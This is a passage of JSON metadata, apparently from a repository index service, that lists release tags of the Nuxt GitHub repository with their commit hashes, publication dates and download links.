","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h